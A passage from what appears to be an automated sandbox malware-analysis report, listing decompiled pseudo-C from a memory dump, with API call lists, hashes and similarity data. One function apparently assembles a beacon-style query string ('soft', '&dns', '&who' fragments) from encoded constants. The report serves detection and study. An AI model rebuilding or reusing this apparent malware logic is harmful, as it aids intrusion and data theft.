                                                          • GetTickCount.KERNEL32 ref: 04C01F2A
                                                          • wsprintfA.USER32 ref: 04C01F77
                                                          • wsprintfA.USER32 ref: 04C01F94
                                                          • wsprintfA.USER32 ref: 04C01FB7
                                                          • HeapFree.KERNEL32(00000000,00000000), ref: 04C01FC7
                                                          • wsprintfA.USER32 ref: 04C01FE9
                                                          • HeapFree.KERNEL32(00000000,00000000), ref: 04C01FF9
                                                          • wsprintfA.USER32 ref: 04C02030
                                                          • wsprintfA.USER32 ref: 04C02050
                                                          • RtlAllocateHeap.NTDLL(00000000,00000800), ref: 04C0206D
                                                          • GetTickCount.KERNEL32 ref: 04C0207D
                                                          • RtlEnterCriticalSection.NTDLL(06889570), ref: 04C02091
                                                          • RtlLeaveCriticalSection.NTDLL(06889570), ref: 04C020AF
                                                            • Part of subcall function 04C01BB6: lstrlen.KERNEL32(00000000,253D7325,00000000,00000000,7742C740,?,?,04C020C2,?,068895B0), ref: 04C01BE1
                                                            • Part of subcall function 04C01BB6: lstrlen.KERNEL32(?,?,?,04C020C2,?,068895B0), ref: 04C01BE9
                                                            • Part of subcall function 04C01BB6: strcpy.NTDLL ref: 04C01C00
                                                            • Part of subcall function 04C01BB6: lstrcat.KERNEL32(00000000,?), ref: 04C01C0B
                                                            • Part of subcall function 04C01BB6: StrTrimA.SHLWAPI(00000000,=,00000000,00000000,?,?,?,04C020C2,?,068895B0), ref: 04C01C28
                                                          • StrTrimA.SHLWAPI(00000000,04C0C28C,?,068895B0), ref: 04C020E1
                                                            • Part of subcall function 04C0361A: lstrlen.KERNEL32(06889A78,00000000,00000000,7742C740,04C020ED,00000000), ref: 04C0362A
                                                            • Part of subcall function 04C0361A: lstrlen.KERNEL32(?), ref: 04C03632
                                                            • Part of subcall function 04C0361A: lstrcpy.KERNEL32(00000000,06889A78), ref: 04C03646
                                                            • Part of subcall function 04C0361A: lstrcat.KERNEL32(00000000,?), ref: 04C03651
                                                          • lstrcpy.KERNEL32(00000000,?), ref: 04C02100
                                                          • lstrcpy.KERNEL32(00000000,00000000), ref: 04C02107
                                                          • lstrcat.KERNEL32(00000000,?), ref: 04C02114
                                                          • lstrcat.KERNEL32(00000000,00000000), ref: 04C02118
                                                            • Part of subcall function 04C06777: WaitForSingleObject.KERNEL32(00000000,00000000,00000000,74B481D0), ref: 04C06829
                                                          • HeapFree.KERNEL32(00000000,?,00000000,?,?), ref: 04C02148
                                                          • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 04C02157
                                                          • HeapFree.KERNEL32(00000000,00000000,?,068895B0), ref: 04C02166
                                                          • HeapFree.KERNEL32(00000000,00000000), ref: 04C02178
                                                          • HeapFree.KERNEL32(00000000,?), ref: 04C02187
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.251948792.0000000004C01000.00000020.00000001.sdmp, Offset: 04C00000, based on PE: true
                                                          • Associated: 00000006.00000002.251933350.0000000004C00000.00000004.00000001.sdmp
                                                          • Associated: 00000006.00000002.252201057.0000000004C0C000.00000002.00000001.sdmp
                                                          • Associated: 00000006.00000002.252419706.0000000004C0D000.00000004.00000001.sdmp
                                                          • Associated: 00000006.00000002.252503147.0000000004C0F000.00000002.00000001.sdmp
                                                          Similarity
                                                          • API ID: Heap$Free$wsprintf$lstrcatlstrlen$lstrcpy$CountCriticalSectionTickTrim$AllocateEnterLeaveObjectSingleWaitstrcpy
                                                          • String ID:
                                                          • API String ID: 3080378247-0
                                                          • Opcode ID: 6fd3d43a32a1f9629b3020b6c98aaef79863c1c13c1397b9bf63a664e6454227
                                                          • Instruction ID: 5897f6038c573263182c2f26e6984f9b3d780ab3d2e34a53b6a4b4e4c91e8770
                                                          • Opcode Fuzzy Hash: 6fd3d43a32a1f9629b3020b6c98aaef79863c1c13c1397b9bf63a664e6454227
                                                          • Instruction Fuzzy Hash: AA61E739500200AFE711DBA8EC48F6677F9EB48744F064614FA0AD72A0DB3DED85DB65
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 74%
                                                          			E04C04AB6(long __eax, void* __ecx, void* __edx, intOrPtr _a4, char** _a8, int* _a12, void* _a16) {
                                                          				void* _v8;
                                                          				signed int _v12;
                                                          				void* _v16;
                                                          				void* _v20;
                                                          				void* _v24;
                                                          				void* _v28;
                                                          				void* __ebx;
                                                          				void* __edi;
                                                          				long _t59;
                                                          				intOrPtr _t60;
                                                          				intOrPtr _t61;
                                                          				intOrPtr _t62;
                                                          				intOrPtr _t63;
                                                          				intOrPtr _t64;
                                                          				void* _t67;
                                                          				intOrPtr _t68;
                                                          				int _t71;
                                                          				void* _t72;
                                                          				void* _t73;
                                                          				void* _t75;
                                                          				void* _t78;
                                                          				intOrPtr _t82;
                                                          				intOrPtr _t86;
                                                          				intOrPtr* _t88;
                                                          				void* _t94;
                                                          				intOrPtr _t100;
                                                          				signed int _t104;
                                                          				char** _t106;
                                                          				int _t109;
                                                          				intOrPtr* _t112;
                                                          				intOrPtr* _t114;
                                                          				intOrPtr* _t116;
                                                          				intOrPtr* _t118;
                                                          				intOrPtr _t121;
                                                          				intOrPtr _t126;
                                                          				int _t130;
                                                          				CHAR* _t132;
                                                          				intOrPtr _t133;
                                                          				void* _t134;
                                                          				void* _t143;
                                                          				int _t144;
                                                          				void* _t145;
                                                          				intOrPtr _t146;
                                                          				void* _t148;
                                                          				long _t152;
                                                          				intOrPtr* _t153;
                                                          				intOrPtr* _t154;
                                                          				intOrPtr* _t157;
                                                          				void* _t158;
                                                          				void* _t160;
                                                          
                                                          				_t143 = __edx;
                                                          				_t134 = __ecx;
                                                          				_t59 = __eax;
                                                          				_v12 = 8;
                                                          				if(__eax == 0) {
                                                          					_t59 = GetTickCount();
                                                          				}
                                                          				_t60 =  *0x4c0d018; // 0xf1c1aee9
                                                          				asm("bswap eax");
                                                          				_t61 =  *0x4c0d014; // 0x3a87c8cd
                                                          				_t132 = _a16;
                                                          				asm("bswap eax");
                                                          				_t62 =  *0x4c0d010; // 0xd8d2f808
                                                          				asm("bswap eax");
                                                          				_t63 = E04C0D00C; // 0xeec43f25
                                                          				asm("bswap eax");
                                                          				_t64 =  *0x4c0d2a8; // 0x1c7a5a8
                                                          				_t3 = _t64 + 0x4c0e633; // 0x74666f73
                                                          				_t144 = wsprintfA(_t132, _t3, 3, 0x3d15e, _t63, _t62, _t61, _t60,  *0x4c0d02c,  *0x4c0d004, _t59);
                                                          				_t67 = E04C056CD();
                                                          				_t68 =  *0x4c0d2a8; // 0x1c7a5a8
                                                          				_t4 = _t68 + 0x4c0e673; // 0x74707526
                                                          				_t71 = wsprintfA(_t144 + _t132, _t4, _t67);
                                                          				_t160 = _t158 + 0x38;
                                                          				_t145 = _t144 + _t71;
                                                          				_t72 = E04C058DB(_t134);
                                                          				_t133 = __imp__;
                                                          				_v8 = _t72;
                                                          				if(_t72 != 0) {
                                                          					_t126 =  *0x4c0d2a8; // 0x1c7a5a8
                                                          					_t7 = _t126 + 0x4c0e8d4; // 0x736e6426
                                                          					_t130 = wsprintfA(_a16 + _t145, _t7, _t72);
                                                          					_t160 = _t160 + 0xc;
                                                          					_t145 = _t145 + _t130;
                                                          					HeapFree( *0x4c0d238, 0, _v8);
                                                          				}
                                                          				_t73 = E04C0A199();
                                                          				_v8 = _t73;
                                                          				if(_t73 != 0) {
                                                          					_t121 =  *0x4c0d2a8; // 0x1c7a5a8
                                                          					_t11 = _t121 + 0x4c0e8dc; // 0x6f687726
                                                          					wsprintfA(_t145 + _a16, _t11, _t73);
                                                          					_t160 = _t160 + 0xc;
                                                          					HeapFree( *0x4c0d238, 0, _v8);
                                                          				}
                                                          				_t146 =  *0x4c0d32c; // 0x68895b0
                                                          				_t75 = E04C04622(0x4c0d00a, _t146 + 4);
                                                          				_t152 = 0;
                                                          				_v20 = _t75;
                                                          				if(_t75 == 0) {
                                                          					L26:
                                                          					HeapFree( *0x4c0d238, _t152, _a16);
                                                          					return _v12;
                                                          				} else {
                                                          					_t78 = RtlAllocateHeap( *0x4c0d238, 0, 0x800);
                                                          					_v8 = _t78;
                                                          					if(_t78 == 0) {
                                                          						L25:
                                                          						HeapFree( *0x4c0d238, _t152, _v20);
                                                          						goto L26;
                                                          					}
                                                          					E04C0518F(GetTickCount());
                                                          					_t82 =  *0x4c0d32c; // 0x68895b0
                                                          					__imp__(_t82 + 0x40);
                                                          					asm("lock xadd [eax], ecx");
                                                          					_t86 =  *0x4c0d32c; // 0x68895b0
                                                          					__imp__(_t86 + 0x40);
                                                          					_t88 =  *0x4c0d32c; // 0x68895b0
                                                          					_t148 = E04C01BB6(1, _t143, _a16,  *_t88);
                                                          					_v28 = _t148;
                                                          					asm("lock xadd [eax], ecx");
                                                          					if(_t148 == 0) {
                                                          						L24:
                                                          						HeapFree( *0x4c0d238, _t152, _v8);
                                                          						goto L25;
                                                          					}
                                                          					StrTrimA(_t148, 0x4c0c28c);
                                                          					_push(_t148);
                                                          					_t94 = E04C0361A();
                                                          					_v16 = _t94;
                                                          					if(_t94 == 0) {
                                                          						L23:
                                                          						HeapFree( *0x4c0d238, _t152, _t148);
                                                          						goto L24;
                                                          					}
                                                          					_t153 = __imp__;
                                                          					 *_t153(_t148, _a4);
                                                          					 *_t153(_v8, _v20);
                                                          					_t154 = __imp__;
                                                          					 *_t154(_v8, _v16);
                                                          					_t100 = E04C09070( *_t154(_v8, _t148), _v8);
                                                          					_a4 = _t100;
                                                          					if(_t100 == 0) {
                                                          						_v12 = 8;
                                                          						L21:
                                                          						E04C06761();
                                                          						L22:
                                                          						HeapFree( *0x4c0d238, 0, _v16);
                                                          						_t152 = 0;
                                                          						goto L23;
                                                          					}
                                                          					_t104 = E04C069B4(_t133, 0xffffffffffffffff, _t148,  &_v24);
                                                          					_v12 = _t104;
                                                          					if(_t104 == 0) {
                                                          						_t157 = _v24;
                                                          						_v12 = E04C0391F(_t157, _a4, _a8, _a12);
                                                          						_t112 =  *((intOrPtr*)(_t157 + 8));
                                                          						 *((intOrPtr*)( *_t112 + 0x80))(_t112);
                                                          						_t114 =  *((intOrPtr*)(_t157 + 8));
                                                          						 *((intOrPtr*)( *_t114 + 8))(_t114);
                                                          						_t116 =  *((intOrPtr*)(_t157 + 4));
                                                          						 *((intOrPtr*)( *_t116 + 8))(_t116);
                                                          						_t118 =  *_t157;
                                                          						 *((intOrPtr*)( *_t118 + 8))(_t118);
                                                          						E04C0A734(_t157);
                                                          					}
                                                          					if(_v12 != 0x10d2) {
                                                          						L16:
                                                          						if(_v12 == 0) {
                                                          							_t106 = _a8;
                                                          							if(_t106 != 0) {
                                                          								_t149 =  *_t106;
                                                          								_t155 =  *_a12;
                                                          								wcstombs( *_t106,  *_t106,  *_a12);
                                                          								_t109 = E04C05800(_t149, _t149, _t155 >> 1);
                                                          								_t148 = _v28;
                                                          								 *_a12 = _t109;
                                                          							}
                                                          						}
                                                          						goto L19;
                                                          					} else {
                                                          						if(_a8 != 0) {
                                                          							L19:
                                                          							E04C0A734(_a4);
                                                          							if(_v12 == 0 || _v12 == 0x10d2) {
                                                          								goto L22;
                                                          							} else {
                                                          								goto L21;
                                                          							}
                                                          						}
                                                          						_v12 = _v12 & 0x00000000;
                                                          						goto L16;
                                                          					}
                                                          				}
                                                          			}


                                                          APIs
                                                          • GetTickCount.KERNEL32 ref: 04C04ACA
                                                          • wsprintfA.USER32 ref: 04C04B1A
                                                          • wsprintfA.USER32 ref: 04C04B37
                                                          • wsprintfA.USER32 ref: 04C04B63
                                                          • HeapFree.KERNEL32(00000000,?), ref: 04C04B75
                                                          • wsprintfA.USER32 ref: 04C04B96
                                                          • HeapFree.KERNEL32(00000000,?), ref: 04C04BA6
                                                          • RtlAllocateHeap.NTDLL(00000000,00000800), ref: 04C04BD4
                                                          • GetTickCount.KERNEL32 ref: 04C04BE5
                                                          • RtlEnterCriticalSection.NTDLL(06889570), ref: 04C04BF9
                                                          • RtlLeaveCriticalSection.NTDLL(06889570), ref: 04C04C17
                                                            • Part of subcall function 04C01BB6: lstrlen.KERNEL32(00000000,253D7325,00000000,00000000,7742C740,?,?,04C020C2,?,068895B0), ref: 04C01BE1
                                                            • Part of subcall function 04C01BB6: lstrlen.KERNEL32(?,?,?,04C020C2,?,068895B0), ref: 04C01BE9
                                                            • Part of subcall function 04C01BB6: strcpy.NTDLL ref: 04C01C00
                                                            • Part of subcall function 04C01BB6: lstrcat.KERNEL32(00000000,?), ref: 04C01C0B
                                                            • Part of subcall function 04C01BB6: StrTrimA.SHLWAPI(00000000,=,00000000,00000000,?,?,?,04C020C2,?,068895B0), ref: 04C01C28
                                                          • StrTrimA.SHLWAPI(00000000,04C0C28C,?,068895B0), ref: 04C04C4E
                                                            • Part of subcall function 04C0361A: lstrlen.KERNEL32(06889A78,00000000,00000000,7742C740,04C020ED,00000000), ref: 04C0362A
                                                            • Part of subcall function 04C0361A: lstrlen.KERNEL32(?), ref: 04C03632
                                                            • Part of subcall function 04C0361A: lstrcpy.KERNEL32(00000000,06889A78), ref: 04C03646
                                                            • Part of subcall function 04C0361A: lstrcat.KERNEL32(00000000,?), ref: 04C03651
                                                          • lstrcpy.KERNEL32(00000000,?), ref: 04C04C6F
                                                          • lstrcpy.KERNEL32(?,?), ref: 04C04C77
                                                          • lstrcat.KERNEL32(?,?), ref: 04C04C85
                                                          • lstrcat.KERNEL32(?,00000000), ref: 04C04C8B
                                                            • Part of subcall function 04C09070: lstrlen.KERNEL32(?,00000000,06889A98,00000000,04C08808,06889C76,?,?,?,?,?,63699BC3,00000005,04C0D00C), ref: 04C09077
                                                            • Part of subcall function 04C09070: mbstowcs.NTDLL ref: 04C090A0
                                                            • Part of subcall function 04C09070: memset.NTDLL ref: 04C090B2
                                                          • wcstombs.NTDLL ref: 04C04D1C
                                                            • Part of subcall function 04C0391F: SysAllocString.OLEAUT32(?), ref: 04C0395A
                                                            • Part of subcall function 04C0A734: HeapFree.KERNEL32(00000000,00000000,04C05637,00000000,?,?,00000000), ref: 04C0A740
                                                          • HeapFree.KERNEL32(00000000,?,?), ref: 04C04D5D
                                                          • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 04C04D69
                                                          • HeapFree.KERNEL32(00000000,?,?,068895B0), ref: 04C04D75
                                                          • HeapFree.KERNEL32(00000000,?), ref: 04C04D81
                                                          • HeapFree.KERNEL32(00000000,?), ref: 04C04D8D
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.251948792.0000000004C01000.00000020.00000001.sdmp, Offset: 04C00000, based on PE: true
                                                          • Associated: 00000006.00000002.251933350.0000000004C00000.00000004.00000001.sdmp
                                                          • Associated: 00000006.00000002.252201057.0000000004C0C000.00000002.00000001.sdmp
                                                          • Associated: 00000006.00000002.252419706.0000000004C0D000.00000004.00000001.sdmp
                                                          • Associated: 00000006.00000002.252503147.0000000004C0F000.00000002.00000001.sdmp
                                                          Similarity
                                                          • API ID: Heap$Free$lstrlen$lstrcatwsprintf$lstrcpy$CountCriticalSectionTickTrim$AllocAllocateEnterLeaveStringmbstowcsmemsetstrcpywcstombs
                                                          • String ID:
                                                          • API String ID: 3748877296-0
                                                          • Opcode ID: 0cf46fa75315930a54437b2059875f88cd32973bded0c031304a2f8530e8cbcf
                                                          • Instruction ID: bf264c44174af88b16e448e4ee3f7f7104fb504107280a93ee8fd79c557d7f71
                                                          • Opcode Fuzzy Hash: 0cf46fa75315930a54437b2059875f88cd32973bded0c031304a2f8530e8cbcf
                                                          • Instruction Fuzzy Hash: 98916B75900208BFDB15DFA8DC88AAE7BBAEF08314F158054F506D72A0DB35EE91DB64
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 51%
                                                          			E04C0AC55(long _a4, long _a8) {
                                                          				signed int _v8;
                                                          				intOrPtr _v16;
                                                          				LONG* _v28;
                                                          				long _v40;
                                                          				long _v44;
                                                          				long _v48;
                                                          				CHAR* _v52;
                                                          				long _v56;
                                                          				CHAR* _v60;
                                                          				long _v64;
                                                          				signed int* _v68;
                                                          				char _v72;
                                                          				signed int _t76;
                                                          				signed int _t80;
                                                          				signed int _t81;
                                                          				intOrPtr* _t82;
                                                          				intOrPtr* _t83;
                                                          				intOrPtr* _t85;
                                                          				intOrPtr* _t90;
                                                          				intOrPtr* _t95;
                                                          				intOrPtr* _t98;
                                                          				void* _t102;
                                                          				intOrPtr* _t104;
                                                          				void* _t115;
                                                          				long _t116;
                                                          				void _t125;
                                                          				void* _t131;
                                                          				signed short _t133;
                                                          				struct HINSTANCE__* _t138;
                                                          				signed int* _t139;
                                                          
                                                          				_t139 = _a4;
                                                          				_v28 = _t139[2] + 0x4c00000;
                                                          				_t115 = _t139[3] + 0x4c00000;
                                                          				_t131 = _t139[4] + 0x4c00000;
                                                          				_v8 = _t139[7];
                                                          				_v60 = _t139[1] + 0x4c00000;
                                                          				_v16 = _t139[5] + 0x4c00000;
                                                          				_v64 = _a8;
                                                          				_v72 = 0x24;
                                                          				_v68 = _t139;
                                                          				_v56 = 0;
                                                          				asm("stosd");
                                                          				_v48 = 0;
                                                          				_v44 = 0;
                                                          				_v40 = 0;
                                                          				if(( *_t139 & 0x00000001) == 0) {
                                                          					_a8 =  &_v72;
                                                          					RaiseException(0xc06d0057, 0, 1,  &_a8);
                                                          					return 0;
                                                          				}
                                                          				_t138 =  *_v28;
                                                          				_t76 = _a8 - _t115 >> 2 << 2;
                                                          				_t133 =  *(_t131 + _t76);
                                                          				_a4 = _t76;
                                                          				_t80 =  !(_t133 >> 0x1f) & 0x00000001;
                                                          				_v56 = _t80;
                                                          				_t81 = _t133 + 0x4c00002;
                                                          				if(_t80 == 0) {
                                                          					_t81 = _t133 & 0x0000ffff;
                                                          				}
                                                          				_v52 = _t81;
                                                          				_t82 =  *0x4c0d1a0; // 0x0
                                                          				_t116 = 0;
                                                          				if(_t82 == 0) {
                                                          					L6:
                                                          					if(_t138 != 0) {
                                                          						L18:
                                                          						_t83 =  *0x4c0d1a0; // 0x0
                                                          						_v48 = _t138;
                                                          						if(_t83 != 0) {
                                                          							_t116 =  *_t83(2,  &_v72);
                                                          						}
                                                          						if(_t116 != 0) {
                                                          							L32:
                                                          							 *_a8 = _t116;
                                                          							L33:
                                                          							_t85 =  *0x4c0d1a0; // 0x0
                                                          							if(_t85 != 0) {
                                                          								_v40 = _v40 & 0x00000000;
                                                          								_v48 = _t138;
                                                          								_v44 = _t116;
                                                          								 *_t85(5,  &_v72);
                                                          							}
                                                          							return _t116;
                                                          						} else {
                                                          							if(_t139[5] == _t116 || _t139[7] == _t116) {
                                                          								L27:
                                                          								_t116 = GetProcAddress(_t138, _v52);
                                                          								if(_t116 == 0) {
                                                          									_v40 = GetLastError();
                                                          									_t90 =  *0x4c0d19c; // 0x0
                                                          									if(_t90 != 0) {
                                                          										_t116 =  *_t90(4,  &_v72);
                                                          									}
                                                          									if(_t116 == 0) {
                                                          										_a4 =  &_v72;
                                                          										RaiseException(0xc06d007f, _t116, 1,  &_a4);
                                                          										_t116 = _v44;
                                                          									}
                                                          								}
                                                          								goto L32;
                                                          							} else {
                                                          								_t95 =  *((intOrPtr*)(_t138 + 0x3c)) + _t138;
                                                          								if( *_t95 == 0x4550 &&  *((intOrPtr*)(_t95 + 8)) == _v8 && _t138 ==  *((intOrPtr*)(_t95 + 0x34))) {
                                                          									_t116 =  *(_a4 + _v16);
                                                          									if(_t116 != 0) {
                                                          										goto L32;
                                                          									}
                                                          								}
                                                          								goto L27;
                                                          							}
                                                          						}
                                                          					}
                                                          					_t98 =  *0x4c0d1a0; // 0x0
                                                          					if(_t98 == 0) {
                                                          						L9:
                                                          						_t138 = LoadLibraryA(_v60);
                                                          						if(_t138 != 0) {
                                                          							L13:
                                                          							if(InterlockedExchange(_v28, _t138) == _t138) {
                                                          								FreeLibrary(_t138);
                                                          							} else {
                                                          								if(_t139[6] != 0) {
                                                          									_t102 = LocalAlloc(0x40, 8);
                                                          									if(_t102 != 0) {
                                                          										 *(_t102 + 4) = _t139;
                                                          										_t125 =  *0x4c0d198; // 0x0
                                                          										 *_t102 = _t125;
                                                          										 *0x4c0d198 = _t102;
                                                          									}
                                                          								}
                                                          							}
                                                          							goto L18;
                                                          						}
                                                          						_v40 = GetLastError();
                                                          						_t104 =  *0x4c0d19c; // 0x0
                                                          						if(_t104 == 0) {
                                                          							L12:
                                                          							_a8 =  &_v72;
                                                          							RaiseException(0xc06d007e, 0, 1,  &_a8);
                                                          							return _v44;
                                                          						}
                                                          						_t138 =  *_t104(3,  &_v72);
                                                          						if(_t138 != 0) {
                                                          							goto L13;
                                                          						}
                                                          						goto L12;
                                                          					}
                                                          					_t138 =  *_t98(1,  &_v72);
                                                          					if(_t138 != 0) {
                                                          						goto L13;
                                                          					}
                                                          					goto L9;
                                                          				}
                                                          				_t116 =  *_t82(0,  &_v72);
                                                          				if(_t116 != 0) {
                                                          					goto L33;
                                                          				}
                                                          				goto L6;
                                                          			}

                                                          0x04c0adf0
                                                          0x04c0adeb
                                                          0x04c0ad31
                                                          0x04c0ad38
                                                          0x04c0ad48
                                                          0x04c0ad51
                                                          0x04c0ad55
                                                          0x04c0ad98
                                                          0x04c0ada4
                                                          0x04c0adcd
                                                          0x04c0ada6
                                                          0x04c0adaa
                                                          0x04c0adb0
                                                          0x04c0adb8
                                                          0x04c0adba
                                                          0x04c0adbd
                                                          0x04c0adc3
                                                          0x04c0adc5
                                                          0x04c0adc5
                                                          0x04c0adb8
                                                          0x04c0adaa
                                                          0x00000000
                                                          0x04c0ada4
                                                          0x04c0ad5d
                                                          0x04c0ad60
                                                          0x04c0ad67
                                                          0x04c0ad77
                                                          0x04c0ad7a
                                                          0x04c0ad8a
                                                          0x00000000
                                                          0x04c0ad90
                                                          0x04c0ad71
                                                          0x04c0ad75
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x04c0ad75
                                                          0x04c0ad42
                                                          0x04c0ad46
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x04c0ad46
                                                          0x04c0ad1f
                                                          0x04c0ad23
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000

                                                          APIs
                                                          • RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 04C0ACCE
                                                          • LoadLibraryA.KERNEL32(?), ref: 04C0AD4B
                                                          • GetLastError.KERNEL32 ref: 04C0AD57
                                                          • RaiseException.KERNEL32(C06D007E,00000000,00000001,?), ref: 04C0AD8A
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.251948792.0000000004C01000.00000020.00000001.sdmp, Offset: 04C00000, based on PE: true
                                                          • Associated: 00000006.00000002.251933350.0000000004C00000.00000004.00000001.sdmp
                                                          • Associated: 00000006.00000002.252201057.0000000004C0C000.00000002.00000001.sdmp
                                                          • Associated: 00000006.00000002.252419706.0000000004C0D000.00000004.00000001.sdmp
                                                          • Associated: 00000006.00000002.252503147.0000000004C0F000.00000002.00000001.sdmp
                                                          Similarity
                                                          • API ID: ExceptionRaise$ErrorLastLibraryLoad
                                                          • String ID: $
                                                          • API String ID: 948315288-3993045852
                                                          • Opcode ID: de7c6579dbc3751815e5a8bc7e13304d6962b2234889ff3e6cfa584ef321f38e
                                                          • Instruction ID: 2c75a880f7efa60ee010aa7cd198ab9ce7846358c915421a11d6e1df37a1e3c2
                                                          • Opcode Fuzzy Hash: de7c6579dbc3751815e5a8bc7e13304d6962b2234889ff3e6cfa584ef321f38e
                                                          • Instruction Fuzzy Hash: D8816C75A00305AFDB14CFA8D880BAEB7F6FF58314F158129E915E7280EBB5EA44CB50
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 27%
                                                          			E04C06C38(intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, intOrPtr* _a16, intOrPtr* _a20) {
                                                          				intOrPtr _v8;
                                                          				intOrPtr _v12;
                                                          				long _v16;
                                                          				intOrPtr _v20;
                                                          				signed int _v24;
                                                          				void* __esi;
                                                          				long _t43;
                                                          				intOrPtr _t44;
                                                          				intOrPtr _t46;
                                                          				void* _t48;
                                                          				void* _t49;
                                                          				void* _t50;
                                                          				intOrPtr _t54;
                                                          				intOrPtr _t57;
                                                          				void* _t58;
                                                          				void* _t59;
                                                          				void* _t60;
                                                          				intOrPtr _t66;
                                                          				void* _t71;
                                                          				void* _t74;
                                                          				intOrPtr _t75;
                                                          				void* _t77;
                                                          				intOrPtr _t79;
                                                          				intOrPtr* _t80;
                                                          				intOrPtr _t91;
                                                          
                                                          				_t79 =  *0x4c0d33c; // 0x6889798
                                                          				_v24 = 8;
                                                          				_t43 = GetTickCount();
                                                          				_push(5);
                                                          				_t74 = 0xa;
                                                          				_v16 = _t43;
                                                          				_t44 = E04C0A557(_t74,  &_v16);
                                                          				_v8 = _t44;
                                                          				if(_t44 == 0) {
                                                          					_v8 = 0x4c0c18c;
                                                          				}
                                                          				_t46 = E04C018A5(_t79);
                                                          				_v12 = _t46;
                                                          				if(_t46 != 0) {
                                                          					_t80 = __imp__;
                                                          					_t48 =  *_t80(_v8, _t71);
                                                          					_t49 =  *_t80(_v12);
                                                          					_t50 =  *_t80(_a4);
                                                          					_t54 = E04C0A71F(lstrlenW(_a8) + _t48 + _t48 + _t49 + _t50 + lstrlenW(_a8) + _t48 + _t48 + _t49 + _t50 + 0x102);
                                                          					_v20 = _t54;
                                                          					if(_t54 != 0) {
                                                          						_t75 =  *0x4c0d2a8; // 0x1c7a5a8
                                                          						_t16 = _t75 + 0x4c0eb08; // 0x530025
                                                          						 *0x4c0d118(_t54, _t16, _v8, _v8, _a4, _v12, _a8);
                                                          						_push(4);
                                                          						_t77 = 5;
                                                          						_t57 = E04C0A557(_t77,  &_v16);
                                                          						_v8 = _t57;
                                                          						if(_t57 == 0) {
                                                          							_v8 = 0x4c0c190;
                                                          						}
                                                          						_t58 =  *_t80(_v8);
                                                          						_t59 =  *_t80(_v12);
                                                          						_t60 =  *_t80(_a4);
                                                          						_t91 = E04C0A71F(lstrlenW(_a12) + _t58 + _t58 + _t59 + _t60 + lstrlenW(_a12) + _t58 + _t58 + _t59 + _t60 + 0x13a);
                                                          						if(_t91 == 0) {
                                                          							E04C0A734(_v20);
                                                          						} else {
                                                          							_t66 =  *0x4c0d2a8; // 0x1c7a5a8
                                                          							_t31 = _t66 + 0x4c0ec28; // 0x73006d
                                                          							 *0x4c0d118(_t91, _t31, _v8, _v8, _a4, _v12, _a12);
                                                          							 *_a16 = _v20;
                                                          							_v24 = _v24 & 0x00000000;
                                                          							 *_a20 = _t91;
                                                          						}
                                                          					}
                                                          					E04C0A734(_v12);
                                                          				}
                                                          				return _v24;
                                                          			}


                                                          APIs
                                                          • GetTickCount.KERNEL32 ref: 04C06C4D
                                                          • lstrlen.KERNEL32(?,80000002,00000005), ref: 04C06C8D
                                                          • lstrlen.KERNEL32(00000000), ref: 04C06C96
                                                          • lstrlen.KERNEL32(00000000), ref: 04C06C9D
                                                          • lstrlenW.KERNEL32(80000002), ref: 04C06CAA
                                                          • lstrlen.KERNEL32(?,00000004), ref: 04C06D0A
                                                          • lstrlen.KERNEL32(?), ref: 04C06D13
                                                          • lstrlen.KERNEL32(?), ref: 04C06D1A
                                                          • lstrlenW.KERNEL32(?), ref: 04C06D21
                                                            • Part of subcall function 04C0A734: HeapFree.KERNEL32(00000000,00000000,04C05637,00000000,?,?,00000000), ref: 04C0A740
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.251948792.0000000004C01000.00000020.00000001.sdmp, Offset: 04C00000, based on PE: true
                                                          • Associated: 00000006.00000002.251933350.0000000004C00000.00000004.00000001.sdmp
                                                          • Associated: 00000006.00000002.252201057.0000000004C0C000.00000002.00000001.sdmp
                                                          • Associated: 00000006.00000002.252419706.0000000004C0D000.00000004.00000001.sdmp
                                                          • Associated: 00000006.00000002.252503147.0000000004C0F000.00000002.00000001.sdmp
                                                          Similarity
                                                          • API ID: lstrlen$CountFreeHeapTick
                                                          • String ID:
                                                          • API String ID: 2535036572-0
                                                          • Opcode ID: 92bb128763c7cf6131a24e44b5c9accab2dddf70685212266837f47343ad3f1e
                                                          • Instruction ID: be7895e2df47ccd12c75aa5da5c7501302a6c4c024bd4f12736018e63a2b647c
                                                          • Opcode Fuzzy Hash: 92bb128763c7cf6131a24e44b5c9accab2dddf70685212266837f47343ad3f1e
                                                          • Instruction Fuzzy Hash: 0B415076D00219FBDF11AFA4CC08ADEBBB6EF44318F068150E905A7250DB35EB50EB90
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 73%
                                                          			E04C08EA1(void* __eax, void* __ecx) {
                                                          				long _v8;
                                                          				char _v12;
                                                          				void* _v16;
                                                          				void* _v28;
                                                          				long _v32;
                                                          				void _v104;
                                                          				char _v108;
                                                          				long _t36;
                                                          				intOrPtr _t40;
                                                          				intOrPtr _t47;
                                                          				intOrPtr _t50;
                                                          				void* _t58;
                                                          				void* _t68;
                                                          				intOrPtr* _t70;
                                                          				intOrPtr* _t71;
                                                          
                                                          				_t1 = __eax + 0x14; // 0x74183966
                                                          				_t69 =  *_t1;
                                                          				_t36 = E04C0592D(__ecx,  *((intOrPtr*)( *_t1 + 0xc)),  &_v12,  &_v16);
                                                          				_v8 = _t36;
                                                          				if(_t36 != 0) {
                                                          					L12:
                                                          					return _v8;
                                                          				}
                                                          				E04C0A749( *((intOrPtr*)(_t69 + 0xc)),  *((intOrPtr*)(_t69 + 8)), _v12);
                                                          				_t40 = _v12(_v12);
                                                          				_v8 = _t40;
                                                          				if(_t40 == 0 && ( *0x4c0d260 & 0x00000001) != 0) {
                                                          					_v32 = 0;
                                                          					asm("stosd");
                                                          					asm("stosd");
                                                          					asm("stosd");
                                                          					_v108 = 0;
